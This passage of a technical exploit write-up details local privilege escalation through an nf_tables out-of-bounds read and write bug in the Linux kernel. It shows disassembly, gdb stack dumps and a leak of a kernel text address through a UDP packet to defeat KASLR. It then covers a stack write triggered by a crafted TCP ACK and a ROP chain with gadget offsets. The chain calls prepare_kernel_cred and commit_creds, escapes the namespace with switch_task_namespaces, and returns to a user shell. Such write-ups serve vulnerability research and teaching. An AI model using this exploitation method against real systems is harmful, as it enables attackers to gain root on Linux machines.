<p>Our upper bound is reached with the highest register value we can have, <code class="language-plaintext highlighter-rouge">0xff</code>, and the length again set to the maximum, <code class="language-plaintext highlighter-rouge">0x40</code>. In that case <code class="language-plaintext highlighter-rouge">0x3fffffff * 4 + 0x40</code> wraps around to <code class="language-plaintext highlighter-rouge">0x3c &lt; 0x50</code>. Converted to a byte offset that is <code class="language-plaintext highlighter-rouge">0xff * 4 + 0x40 = 0x43c</code>.</p>

<p>So in total we could read from offset <code class="language-plaintext highlighter-rouge">0x3c0</code> to offset <code class="language-plaintext highlighter-rouge">0x43c</code> with this expression, a range of <code class="language-plaintext highlighter-rouge">0x7c = 124</code> bytes.</p>

<p>Those are all of the expressions needed to exploit this vulnerability.</p>

<h3 id="an-exploitation-strategy-">An Exploitation strategy <a name="explstrat"></a></h3>
<p>The exploitation strategy is pretty simple. The netfilter hook we use for our chain and the protocols we choose for the packets going through the firewall all change the stack layout. This means that if the stack layout is not favourable at our OOB read and write range we can experiment a lot with hooks and protocols until we have a favourable stack layout to do what we need to do. So our strategy is essentially:</p>
<ul>
  <li>Find a good hook and protocol such that there is a kernel address in our OOB read range.</li>
  <li>Leak the address and calculate the kernel base.</li>
  <li>Find a good hook and protocol such that the stack layout at our OOB write range is good enough for us to be able to inject a full ROP chain on the stack.</li>
  <li>Build an ROP chain and inject it… voilà.</li>
</ul>

<h3 id="leaking-a-kernel-address-">Leaking a kernel address <a name="leakingkaddr"></a></h3>
<p>The first stage of exploitation is to leak a kernel address in order to find the kernel base. Finding the kernel base address is essential to actually exploit the vulnerability. Due to “Kernel Address Space Layout Randomization” (<code class="language-plaintext highlighter-rouge">KASLR</code>) the kernel is loaded at a different address in memory on each boot. In order to use an ROP chain we need to know the base address to calculate the addresses at which the ROP gadgets are located. Thankfully, because we have an OOB read, we have a very good chance of leaking a kernel address and defeating <code class="language-plaintext highlighter-rouge">KASLR</code>.</p>

<h4 id="nft_do_chain-">nft_do_chain <a name="nft_do_chain"></a></h4>
<p>If you have read the article on nf_tables you know that <code class="language-plaintext highlighter-rouge">nft_do_chain</code> is executed to go through the rules in a chain and execute their expressions whenever a hook is ‘triggered’.</p>

<p>Looking at the generated assembly of <code class="language-plaintext highlighter-rouge">nft_do_chain</code> we need to locate instructions accessing the registers to determine where on the stack the registers are.</p>
<pre><code class="language-assembly">0xffffffff81a6bb40 &lt;+0&gt;:     call   0xffffffff81065160 &lt;__fentry__&gt;
0xffffffff81a6bb45 &lt;+5&gt;:     push   rbp
0xffffffff81a6bb46 &lt;+6&gt;:     mov    rbp,rsp
0xffffffff81a6bb49 &lt;+9&gt;:     push   r15
0xffffffff81a6bb4b &lt;+11&gt;:    mov    r15,rdi
0xffffffff81a6bb4e &lt;+14&gt;:    push   r14
0xffffffff81a6bb50 &lt;+16&gt;:    push   r13
0xffffffff81a6bb52 &lt;+18&gt;:    push   r12
0xffffffff81a6bb54 &lt;+20&gt;:    push   rbx
0xffffffff81a6bb55 &lt;+21&gt;:    and    rsp,0xfffffffffffffff0
0xffffffff81a6bb59 &lt;+25&gt;:    sub    rsp,0x1a0
0xffffffff81a6bb60 &lt;+32&gt;:    mov    rax,QWORD PTR [rdi+0x20]
0xffffffff81a6bb64 &lt;+36&gt;:    mov    QWORD PTR [rsp+0x8],rsi
0xffffffff81a6bb69 &lt;+41&gt;:    mov    rax,QWORD PTR [rax+0x20]
0xffffffff81a6bb6d &lt;+45&gt;:    mov    BYTE PTR [rsp+0x4d],0x0
0xffffffff81a6bb72 &lt;+50&gt;:    movzx  eax,BYTE PTR [rax+0xe94]
0xffffffff81a6bb79 &lt;+57&gt;:    mov    BYTE PTR [rsp+0x13],al
0xffffffff81a6bb7d &lt;+61&gt;:    nop    DWORD PTR [rax+rax*1+0x0]
0xffffffff81a6bb82 &lt;+66&gt;:    mov    rax,QWORD PTR [rsp+0x8]
0xffffffff81a6bb87 &lt;+71&gt;:    mov    DWORD PTR [rsp+0x14],0x0
0xffffffff81a6bb8f &lt;+79&gt;:    mov    QWORD PTR [rsp+0x18],rax
0xffffffff81a6bb94 &lt;+84&gt;:    cmp    BYTE PTR [rsp+0x13],0x0
0xffffffff81a6bb99 &lt;+89&gt;:    mov    rax,QWORD PTR [rsp+0x18]
0xffffffff81a6bb9e &lt;+94&gt;:    je     0xffffffff81a6be90 &lt;nft_do_chain+848&gt;
0xffffffff81a6bba4 &lt;+100&gt;:   mov    r12,QWORD PTR [rax+0x8]
0xffffffff81a6bba8 &lt;+104&gt;:   mov    rax,QWORD PTR [r12]
0xffffffff81a6bbac &lt;+108&gt;:   mov    DWORD PTR [rsp+0x50],0xffffffff ; regs.verdict.code = NFT_CONTINUE;  
0xffffffff81a6bbb4 &lt;+116&gt;:   mov    rbx,QWORD PTR [r12]
0xffffffff81a6bbb8 &lt;+120&gt;:   test   rbx,rbx
...
0xffffffff81a6bc93 &lt;+339&gt;:   mov    r8d,DWORD PTR [rsp+0x50]
0xffffffff81a6bc98 &lt;+344&gt;:   cmp    r8d,0xffffffff
0xffffffff81a6bc9c &lt;+348&gt;:   jne    0xffffffff81a6c039 &lt;nft_do_chain+1273&gt; 
...
</code></pre>
<p>The instruction of importance is at <code class="language-plaintext highlighter-rouge">&lt;+108&gt;</code>. Let’s take a deeper look at it.</p>

<p>At the beginning of <code class="language-plaintext highlighter-rouge">do_chain</code> in <code class="language-plaintext highlighter-rouge">nft_do_chain</code> there is this line of code
<code class="language-plaintext highlighter-rouge">regs.verdict.code = NFT_CONTINUE;</code><br />
You probably know that <code class="language-plaintext highlighter-rouge">NFT_CONTINUE</code> is the default verdict code.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">enum</span> <span class="n">nft_verdicts</span> <span class="p">{</span>
	<span class="n">NFT_CONTINUE</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="c1">// -1 is 0xffffffff due to Two's Complement</span>
	<span class="n">NFT_BREAK</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">2</span><span class="p">,</span>
	<span class="n">NFT_JUMP</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">3</span><span class="p">,</span>
	<span class="n">NFT_GOTO</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">4</span><span class="p">,</span>
	<span class="n">NFT_RETURN</span>	<span class="o">=</span> <span class="o">-</span><span class="mi">5</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>So this instruction at <code class="language-plaintext highlighter-rouge">&lt;+108&gt;</code> sets the verdict register to <code class="language-plaintext highlighter-rouge">NFT_CONTINUE</code>.</p>

<p>The verdict register is the first register - sitting at the very start. Since it is located at <code class="language-plaintext highlighter-rouge">rsp+0x50</code>, 
the registers occupy the space on the stack from <code class="language-plaintext highlighter-rouge">rsp+0x50</code> to <code class="language-plaintext highlighter-rouge">rsp+0xa0</code>.</p>

<p>Also looking at the instructions at <code class="language-plaintext highlighter-rouge">&lt;+339&gt;</code> and <code class="language-plaintext highlighter-rouge">&lt;+344&gt;</code> we can see the check validating that the verdict is still <code class="language-plaintext highlighter-rouge">NFT_CONTINUE</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb-peda$ x/20xw ($rsp+0x50) // printing the registers -&gt; we print 20 words (20 (4 byte) words is 80 bytes = 0x50)
0xffffc90000003c50:     0xffffffff      0x00000000      0x00000000      0x00000000
0xffffc90000003c60:     0x00000011      0xffffffff      0x8105ceac      0xffffffff
0xffffc90000003c70:     0x8117f965      0xffffffff      0xffffffff      0x7fffffff
0xffffc90000003c80:     0x00000006      0x00000000      0x3a61cec0      0xffff8880
0xffffc90000003c90:     0x00000001      0x00000000      0x00011795      0x00000000
</code></pre></div></div>

<p>Now we know where on the stack the <code class="language-plaintext highlighter-rouge">nft_regs</code> are located.</p>
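
<p>As a sanity check on that range, here is a minimal user-space sketch of the register layout. The two structs are simplified stand-ins written for illustration (they are not copied from the kernel headers), and the count of 20 four-byte registers is an assumption taken from the 20 words printed in the gdb session above.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

#define REG32_COUNT 20 /* assumed: 20 four-byte registers */

/* Simplified stand-in for the verdict: a code plus a chain pointer. */
struct verdict_sketch {
    uint32_t code;
    void *chain;
};

/* The verdict overlays the first registers, so its code sits at offset 0. */
struct regs_sketch {
    union {
        uint32_t data[REG32_COUNT];
        struct verdict_sketch verdict;
    };
};

/* End of the register area, given the stack offset where it starts. */
static uint64_t regs_end(uint64_t regs_start)
{
    return regs_start + sizeof(struct regs_sketch);
}
</code></pre></div></div>
<p>With the start at <code class="language-plaintext highlighter-rouge">0x50</code>, <code class="language-plaintext highlighter-rouge">regs_end</code> lands on <code class="language-plaintext highlighter-rouge">0xa0</code>, matching the range read off the disassembly.</p>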

<h4 id="scouting-for-a-kernel-address-">Scouting for a kernel address <a name="scoutingkaddr"></a></h4>
<p>We already have established that we can do an OOB read and write with <code class="language-plaintext highlighter-rouge">nft_bitwise</code>. Using this expression will allow us to copy data from the OOB range and put it into our registers. Then we could use a <code class="language-plaintext highlighter-rouge">nft_payload_set</code> to get the data we saved into the registers and put it into a packet. Once it is in the packet we can listen for it - and read the leaked data.</p>

<blockquote>
  <p>A small note: It is not necessary to use both nft_bitwise and nft_payload_set. You could just use nft_payload_set to directly copy it from the OOB range into the packet. However, when I was writing the exploit I chose to use first <code class="language-plaintext highlighter-rouge">nft_bitwise</code> and then <code class="language-plaintext highlighter-rouge">nft_payload_set</code>.</p>
</blockquote>

<p>We know that with <code class="language-plaintext highlighter-rouge">nft_bitwise</code> we can leak from offset <code class="language-plaintext highlighter-rouge">0x3c0</code> to offset <code class="language-plaintext highlighter-rouge">0x43c</code> - that’s a range of 15 and a half 8-byte words.</p>

<p>Now let’s take a look at the stack layout when we set up a chain with an <strong>output hook</strong> (<code class="language-plaintext highlighter-rouge">NF_INET_LOCAL_OUT</code>) and use a <strong>UDP</strong> packet. Using an output hook means that the rules and expressions we set will be executed right before the packet leaves the nest. We will use a <strong>UDP</strong> packet as it is the simplest option and a one-off - it doesn’t need a connection the way TCP does.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb-peda$ x/16gx ($rsp+0x50+0x3c8)
0xffffc90000227d78:     0x0000000000000008      0xffff8880052dd680
0xffffc90000227d88:     0x0000000000000004      0x0000000000000000
0xffffc90000227d98:     0xffffffff819bfc63      0xffff88800e1db180
0xffffc90000227da8:     0xdd4d4cb9a478c900      0xffff88800e1db180
0xffffc90000227db8:     0xffffc90000227df8      0xffff88800e1db180
0xffffc90000227dc8:     0x0000000000000010      0x0000000000000004
0xffffc90000227dd8:     0x0000000000000000      0xffffc90000227e28
0xffffc90000227de8:     0xffffffff819b7ab7      0xffffffff819b7ab7
</code></pre></div></div>
<p>The address saved at <code class="language-plaintext highlighter-rouge">0xffffc90000227d98</code> immediately stands out as it is obviously a <code class="language-plaintext highlighter-rouge">.text</code> address. This serves us perfectly. It is at offset <code class="language-plaintext highlighter-rouge">0x3e8</code> relative to the beginning of <code class="language-plaintext highlighter-rouge">nft_regs</code>.</p>

<h4 id="leaking-the-address-">Leaking the address <a name="leakingkaddr"></a></h4>

<p>Leaking the address is straightforward now. We have a <code class="language-plaintext highlighter-rouge">.text</code> address ready to be leaked in our OOB read range when we use an <em>output hook</em> and send a UDP packet to ourselves on the loopback interface. Now we need to construct a rule with the proper expressions. First, we copy the address from the OOB range to the registers. Then we need to copy the address from the registers and write it to the UDP packet’s payload. And finally, we just need to be listening for UDP packets so we can receive back the packet carrying the address.</p>

<p>To do that we need to make a rule with the following expressions:</p>
<ul>
  <li>bitwise expression
    <ul>
      <li>sreg = 0xffffff(fe) (0x3e8 / 4 = 0xfa but it will be decreased by 4 so we will add 4 preemptively 0xfa + 4 = 0xfe)</li>
      <li>dreg = NFT_REG32_01</li>
      <li>len = 0x20 (length is bigger than needed to pass the validation)</li>
      <li>bitwise_shift_type = NFT_BITWISE_RSHIFT or NFT_BITWISE_LSHIFT</li>
      <li>data = 0 (shift value must be 0)</li>
    </ul>
  </li>
  <li>payload_set expression
    <ul>
      <li>sreg = NFT_REG32_01</li>
      <li>base = NFT_PAYLOAD_TRANSPORT_HEADER (this base is targeting the UDP header)</li>
      <li>offset = 8 (the UDP header is 8 bytes, we want to be writing right after it - where the payload is)</li>
      <li>len = 8 (the address is 8 bytes)</li>
    </ul>
  </li>
</ul>
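
<p>The <code class="language-plaintext highlighter-rouge">sreg</code> arithmetic from the list above can be sketched as a small helper. The function name is made up for illustration, and the adjustment of 4 simply follows the description above (the value is decreased by 4 when it is parsed); only the low byte of the result is shown.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;

/* Assumed adjustment: the parsed value ends up 4 lower than the one supplied. */
#define SREG_ADJUST 4u

/* Map a byte offset from the start of nft_regs to the sreg value to request. */
static uint32_t sreg_for_offset(uint32_t byte_offset)
{
    uint32_t index = byte_offset / 4; /* registers are 4 bytes wide */
    return index + SREG_ADJUST;       /* compensate for the later decrease */
}
</code></pre></div></div>
<p>For the leak target at offset <code class="language-plaintext highlighter-rouge">0x3e8</code> this yields <code class="language-plaintext highlighter-rouge">0xfe</code>, the low byte used in the bitwise expression.</p>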

<p>Those expressions make a rule that is added to the output chain. 
For the sake of reducing noise, I also added an expression of type <code class="language-plaintext highlighter-rouge">nft_cmp_expr</code> at the beginning of the rule to check the destination port before performing the other expressions. That would make sure we are not writing to some other UDP packet.</p>

<p>After we have set up the rule the only thing left is to spin up a UDP listener and send a UDP packet with an 8-byte payload - the address is going to be written over the 8-byte payload. Then we receive the packet and read the address from it.</p>
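
<p>Once the 8 bytes are back in user space, turning them into a kernel base is a single subtraction. The sketch below assumes the gdb dumps above were taken with the kernel at its default base <code class="language-plaintext highlighter-rouge">0xffffffff81000000</code>, which puts the leaked return address at offset <code class="language-plaintext highlighter-rouge">0x9bfc63</code>; that offset and the helper names are illustrative and specific to one kernel build.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Assumption: offset of the leaked .text address from the kernel base,
 * derived from the debug dump (0xffffffff819bfc63 - 0xffffffff81000000). */
#define LEAK_OFFSET 0x9bfc63ULL

/* The payload was written by the same machine, so host byte order applies. */
static uint64_t leak_from_payload(const unsigned char *payload)
{
    uint64_t leak;
    memcpy(&amp;leak, payload, sizeof leak);
    return leak;
}

/* Subtract the known offset to recover the randomized base. */
static uint64_t kbase_from_leak(uint64_t leak)
{
    return leak - LEAK_OFFSET;
}
</code></pre></div></div>
<p>Every gadget and function address used later is then just the recovered base plus a build-specific offset.</p>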

<p>Now that we have defeated <code class="language-plaintext highlighter-rouge">KASLR</code> it is time we move towards our goal - gaining kernel-space code execution and achieving Local Privilege Escalation.</p>

<h3 id="road-to-code-execution-">Road to Code Execution <a name="ceroad"></a></h3>
<p>Now that we have figured out how to leak the kernel address we need to figure out how to achieve Arbitrary Code Execution.</p>

<p>When we talked about primitives we established that <code class="language-plaintext highlighter-rouge">nft_payload</code> is the best expression for OOB write as we can write up to <code class="language-plaintext highlighter-rouge">0xff</code> bytes - almost 32 eight-byte words.</p>

<p>Ideally, we want to be able to write at least 20-something words on the stack without crashing. In reality, this is a bit more difficult than it seems.</p>

<h4 id="output-hook--udp-packet-">Output hook + UDP packet <a name="outputudp"></a></h4>
<p>Let us look more closely at the stack layout when using an output chain and a UDP packet. We found a <code class="language-plaintext highlighter-rouge">.text</code> address at a nice location there so maybe if it is a saved return address we could inject an ROP chain at that location.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb-peda$ x/40gx ($rsp+0x50+0x308)
0xffffc90000227cb8:     0x0000000000000000      0x0000000000000000
0xffffc90000227cc8:     0x0000000000000000      0x000000000100007f
0xffffc90000227cd8:     0x0000000000000000      0x00000000ffff0000
0xffffc90000227ce8:     0x0000000000000000      0x0000000100000001
0xffffc90000227cf8:     0x0011000000000000      0x0000000000000001
0xffffc90000227d08:     0x0000000000000000      0x0000000000000000
0xffffc90000227d18:     0x0100007f0100007f      0xffff8880699c55c3
0xffffc90000227d28:     0x0000000000000000      0x0000000000000000
0xffffc90000227d38:     0x000000100000ffff      0x0000000000000000
0xffffc90000227d48:     0x00008800ffff0000      0x0000000000000000
0xffffc90000227d58:     0x0000ee4700000000      0x0000000000000000
0xffffc90000227d68:     0xffff8880052d0480      0xffff8880052d0508
0xffffc90000227d78:     0x0000000000000008      0xffff8880052d0480
0xffffc90000227d88:     0x0000000000000004      0x0000000000000000
0xffffc90000227d98:     0xffffffff819bfc63      0xffff88800e233c00
0xffffc90000227da8:     0x3175125abbd91100      0xffff88800e233c00
0xffffc90000227db8:     0xffffc90000227df8      0xffff88800e233c00
0xffffc90000227dc8:     0x0000000000000010      0x0000000000000004
0xffffc90000227dd8:     0x0000000000000000      0xffffc90000227e28
0xffffc90000227de8:     0xffffffff819b7ab7      0xffffffff819b7ab7
</code></pre></div></div>

<p>Looking at the stack right after the address we leaked we see that at location <code class="language-plaintext highlighter-rouge">0xffffc90000227da8</code> there is an obvious stack canary.</p>

<p>We have <code class="language-plaintext highlighter-rouge">.text</code> addresses at <code class="language-plaintext highlighter-rouge">0xffffc90000227de8</code> and <code class="language-plaintext highlighter-rouge">0xffffc90000227df0</code>. Let’s look at what offsets they are. The first one is <code class="language-plaintext highlighter-rouge">0x438</code> bytes away from the start of nft_regs and the other one is <code class="language-plaintext highlighter-rouge">0x440</code>. That makes them outside of our OOB write range.</p>
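
<p>These offsets come straight from the dump: take the distance between the address of interest and the first address gdb printed, then add the offset the dump was started at. A minimal sketch of that arithmetic (the helper name is hypothetical):</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;

/* Offset of a stack address relative to the start of nft_regs, given the
 * first address of a gdb dump and the nft_regs offset the dump began at. */
static uint64_t regs_offset(uint64_t addr, uint64_t dump_addr,
                            uint64_t dump_offset)
{
    return addr - dump_addr + dump_offset;
}
</code></pre></div></div>
<p>Here the dump starts at <code class="language-plaintext highlighter-rouge">0xffffc90000227cb8</code>, which corresponds to offset <code class="language-plaintext highlighter-rouge">0x308</code>, so the two addresses map to <code class="language-plaintext highlighter-rouge">0x438</code> and <code class="language-plaintext highlighter-rouge">0x440</code>.</p>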

<p>So obviously the <em>output hook</em> is not an option in our case.</p>

<h4 id="trying-the-other-hooks-">Trying the other hooks <a name="otherhooks"></a></h4>
<p>After it became obvious that the <strong>output hook</strong> cannot be used on this kernel build I started looking into other hooks. I tried the <strong>input hook</strong>, <strong>prerouting hook</strong> and <strong>postrouting hook</strong> - that is, all of them except the <strong>ingress</strong> and <strong>forward</strong> hooks. After reviewing the stack on all of them I realised none of them have a favourable stack layout (using UDP packets). This was quite disappointing as I had invested a lot of time attempting to do it using UDP packets on the different hooks.</p>

<p>On the <strong>prerouting hook</strong> I even attempted to split the ROP chain around the stack canary and jump between the <em>two</em> ROP chains - but that also did not work as I could not pass the validation while keeping the length low enough so as not to overwrite the stack canary.</p>

<p>After having spent a lot more time than I should have trying to make it work on one of the hooks I decided to look into the stack layout when TCP packets go through the rules.</p>

<h4 id="exploitation-vector-through-tcp-">Exploitation vector through TCP <a name="expltcp"></a></h4>
<p>One of the reasons I worked so hard to make it work with UDP rather than attempting TCP earlier was because TCP requires a connection to be initiated and that is an extra burden we have to deal with.</p>

<p>Another reason I had to avoid TCP is the fact that the stack might differ between different TCP packets due to different flags being set in their headers. And indeed I observed this behaviour. It could also be viewed as a positive rather than a negative - the more different stack layouts we can get the better the chance that one might be exploitable.</p>

<p>First, of course, I tried the output hook. I used a normal <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> socket. While debugging I realised that the stack layout when sending a data packet is not favourable. However, I saw something very interesting… The stack layout looked favourable when the <strong>ACKnowledgement</strong> packet of the connection initialization was being handled.</p>

<p>Now the obvious next step is to include the payload in the <strong>ACK</strong> packet that is sent during initialization. To do that I had to use <strong>raw sockets</strong> and manually build the headers for the <strong>SYN</strong> and <strong>ACK</strong> packets. That allowed me to attach a payload to the <strong>ACK</strong> packet, which is not possible via a <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> socket.</p>

<p>Weirdly the stack layout changed when using a raw socket - it did not look as it did when I was using a normal <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> socket. That was weird… however it wasn’t an obstacle as the new stack layout was also vulnerable. Let’s take a look at it.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb-peda$ x/42gx ($rsp+0x50+0x308)
0xffffc90000237d78:     0x0000000000000001      0xffffea0000086d40
0xffffc90000237d88:     0x0000000000000000      0x0000000000000000
0xffffc90000237d98:     0x0000000000000000      0x0000000000000000
0xffffc90000237da8:     0x885b22be57fdfb00      0xffff88800e266e00
0xffffc90000237db8:     0xffffc90000237df8      0xffff88800e266e00
0xffffc90000237dc8:     0x0000000000000010      0x0000000000000006
0xffffc90000237dd8:     0x0000000000000000      0xffffc90000237e28
0xffffc90000237de8:     0xffffffff819b7ab7      0xffffffff819b7ab7
0xffffc90000237df8:     0x0000000000000000      0x00007f1e7f701df0
0xffffc90000237e08:     0xffffffff819b99c8      0x0000000100000000
0xffffc90000237e18:     0x00007f1e78002bc0      0x00000000000000f4
0xffffc90000237e28:     0xffffc90000237e88      0xffff888000000010
0xffffc90000237e38:     0x0000000000000005      0x0000000000000000
0xffffc90000237e48:     0x0000000000000000      0xffffc90000237e28
0xffffc90000237e58:     0x0000000000000000      0x0000000000000000
0xffffc90000237e68:     0x0000000000000255      0x0000000000000000
0xffffc90000237e78:     0x0000000000000000      0x00007f1e78003bc8
0xffffc90000237e88:     0x0100007f56c30002      0x0000000000403f1c
0xffffc90000237e98:     0xffffffff812b14d5      0x0000000000000255
0xffffc90000237ea8:     0x0000000000000006      0xffffc90000237f58
0xffffc90000237eb8:     0x00007f1e78003bc8      0xffff888003e33300
</code></pre></div></div>

<p>As you can see there are two <code class="language-plaintext highlighter-rouge">.text</code> addresses at the addresses <code class="language-plaintext highlighter-rouge">0xffffc90000237de8</code> and <code class="language-plaintext highlighter-rouge">0xffffc90000237df0</code>. After debugging a little it became clear that the second one is a <strong>saved return address</strong>. There is also no stack cookie anywhere near after it.</p>

<p>That address is at offset <code class="language-plaintext highlighter-rouge">0x390</code> from the beginning of <code class="language-plaintext highlighter-rouge">nft_regs</code>. That is in-bounds of our <code class="language-plaintext highlighter-rouge">nft_payload_set</code> OOB write.</p>

<p>Our upper bound for the OOB write is <code class="language-plaintext highlighter-rouge">0x450</code>. That leaves us with the ability to write <code class="language-plaintext highlighter-rouge">0xc0 = 192</code> bytes on the stack. That is 24 eight-byte words, which should be enough for a full ROP chain.</p>

<h3 id="building-an-rop-chain-">Building an ROP chain <a name="ropchain"></a></h3>
<p>Now that we have the payload injection sorted it is time we start building an ROP chain.
Our ROP chain could be split into three stages - preparing credentials, leaving the namespace sandbox and returning to userland.</p>

<p>First, we need to set up our kernel credentials.</p>

<h4 id="prepare_kernel_cred-">prepare_kernel_cred <a name="prepare_kernel_cred"></a></h4>
<p>We need to call <code class="language-plaintext highlighter-rouge">prepare_kernel_cred</code> passing <em>NULL</em> as the argument. If <em>NULL</em> is supplied then the credentials will be set to 0 with no groups, full capabilities and no keys.</p>

<p>To do that we need to know the address of <code class="language-plaintext highlighter-rouge">prepare_kernel_cred</code>. On my kernel build it is located at offset <code class="language-plaintext highlighter-rouge">0x108aa0</code> from the kernel base address. According to the <code class="language-plaintext highlighter-rouge">x86_64</code> calling convention, the first argument is passed in the <code class="language-plaintext highlighter-rouge">rdi</code> register.</p>

<p><img src="https://i.imgur.com/ozIaAxw.png" alt="convention.jpg" /></p>

<p>So we need just a single gadget here - to pop <em>rdi</em>. The return value of the <code class="language-plaintext highlighter-rouge">prepare_kernel_cred</code> function would of course be saved in the <em>rax</em> register as per the <a href="https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit">convention</a>.</p>

<p>In total for the prepare_kernel_cred part we would need to pass 3 words.</p>

<p>I found a suitable gadget to pop the <code class="language-plaintext highlighter-rouge">rdi</code> register - <code class="language-plaintext highlighter-rouge">0xffffffff81004616 : pop rdi ; ret</code>.
So the offset from the kernel base would be <code class="language-plaintext highlighter-rouge">0x004616</code>.</p>

<h4 id="commit_creds-">commit_creds <a name="commit_creds"></a></h4>
<p>After we have prepared the credentials we need to actually install them upon the current task. To do that we need to call <code class="language-plaintext highlighter-rouge">commit_creds</code>.</p>

<p>We have the credentials in the <code class="language-plaintext highlighter-rouge">rax</code> register. However, we need to pass them to the <code class="language-plaintext highlighter-rouge">commit_creds</code> function. To do that we need to move the <code class="language-plaintext highlighter-rouge">rax</code> register to the <code class="language-plaintext highlighter-rouge">rdi</code> register. The function is located at offset <code class="language-plaintext highlighter-rouge">0x108870</code> from the kernel base. To move <code class="language-plaintext highlighter-rouge">rax</code> to <code class="language-plaintext highlighter-rouge">rdi</code> we need a <code class="language-plaintext highlighter-rouge">mov rdi, rax</code> gadget. Ideally, that means it would take only 2 words to call <code class="language-plaintext highlighter-rouge">commit_creds</code>.</p>

<p>There is one small problem though. There is no <code class="language-plaintext highlighter-rouge">mov rdi, rax ; ret</code> gadget. The best I could find was the following</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0xffffffff81020b1d : mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret
</code></pre></div></div>
<p>It is at offset <code class="language-plaintext highlighter-rouge">0x020b1d</code> from the kernel base.
The gadget requires us to pass one dummy value for the <code class="language-plaintext highlighter-rouge">rbx</code> register.
That would bring the total size of this stage of the ROP chain to 3 words.</p>

<h4 id="switch_task_namespaces-">switch_task_namespaces <a name="switch_task_namespaces"></a></h4>
<p>To exploit this vulnerability we needed the capability <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>. We gained it by putting our process in a sandbox - with a user+network namespace. Now it is time to escape our sandbox and leave the namespace.</p>

<p>To do this we are going to use <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code>. On my build, the entry of that function is at offset <code class="language-plaintext highlighter-rouge">0x107030</code> from the kernel base.</p>

<p>We have to pass two things to the function - the task whose namespaces we want to switch and the <code class="language-plaintext highlighter-rouge">struct nsproxy</code> that holds the namespaces that we are switching to.</p>

<p>We are going to find the task of our process by passing its <strong>pid</strong> to <code class="language-plaintext highlighter-rouge">find_task_by_vpid</code>. That would return a pointer to a <code class="language-plaintext highlighter-rouge">task_struct</code>. This pointer is our first argument to <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code>.</p>

<p>The structure <code class="language-plaintext highlighter-rouge">nsproxy</code> contains pointers to all (net, mnt, pid, cgroup, etc) per-process namespaces. It essentially defines what namespaces a process uses. Every time a namespace of a process is changed, the existing nsproxy is copied and the copy is modified. So all nsproxy instances can be thought of as modifications of an initial one - that of the <code class="language-plaintext highlighter-rouge">init</code> process. The initial nsproxy can be accessed with <code class="language-plaintext highlighter-rouge">init_nsproxy</code>. It is the second argument we pass to <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code>.</p>

<p>Let’s see what gadgets will be needed to do all of this and how many words we are going to need for this part.</p>

<p>We need 3 words to get the pointer to the <code class="language-plaintext highlighter-rouge">task_struct</code>. One gadget to pop rdi, a word to actually pass the <strong>pid</strong> of our process and one word to call <code class="language-plaintext highlighter-rouge">find_task_by_vpid</code>.</p>

<p>To call <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code> we would need 5 words. We use a gadget that performs <code class="language-plaintext highlighter-rouge">mov rdi, rax</code> - because rax holds the pointer to the <code class="language-plaintext highlighter-rouge">task_struct</code> and we want to pass it as a first argument. However, the gadget that I am using has an unnecessary <code class="language-plaintext highlighter-rouge">pop</code> in it, therefore I need to pass one dummy value. That brings it to two words so far. I need two more words to pass <code class="language-plaintext highlighter-rouge">init_nsproxy</code> as a second argument - one for the <code class="language-plaintext highlighter-rouge">pop rsi</code> gadget and one for the address of <code class="language-plaintext highlighter-rouge">init_nsproxy</code>. And finally, I need a 5th word to call <code class="language-plaintext highlighter-rouge">switch_task_namespaces</code>.</p>

<p>In total this stage would require 8 words.</p>

<h4 id="swapgs_restore_regs_and_return_to_usermode-">swapgs_restore_regs_and_return_to_usermode <a name="swapgs"></a></h4>
<p>Now that we have set up our credentials it is time to return execution to usermode. To do that we are going to use this function as a <code class="language-plaintext highlighter-rouge">KPTI trampoline</code>. But why do we need to use a <em>trampoline</em>?</p>

<p>Well we need to swap our GS register. The GS register in the Linux Kernel is used for per-CPU data structures. We need to swap it as we are moving from kernel-space to user-space.</p>

<p>We also need to swap the page tables to the userland ones. That is due to the <code class="language-plaintext highlighter-rouge">Kernel Page Table Isolation</code> feature. It separates user-space and kernel-space page tables - from user-space you can see only user-space pages and minimal kernel-space mappings. From kernel-space however you can see both user-space and kernel-space pages but the user-space pages are not executable. That means that if we don’t swap the page tables we cannot return execution to a function from user-space.</p>

<p>The function <code class="language-plaintext highlighter-rouge">swapgs_restore_regs_and_return_to_usermode</code> is called a <strong>KPTI trampoline</strong> because it swaps the GS register for us, changes the page tables and allows us to pass an IRET frame (Interrupt Return frame). Using the IRET frame we can set the Stack Segment (SS) register, the Stack Pointer (RSP), the RFLAGS register, the Code Segment (CS) register and most importantly - the instruction pointer (RIP).</p>

<p>As the RIP we pass a pointer to a function that will spawn a shell. The rest of the registers we can save before we send the payload, and then simply restore them to the values they had before we entered kernel-space.</p>
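
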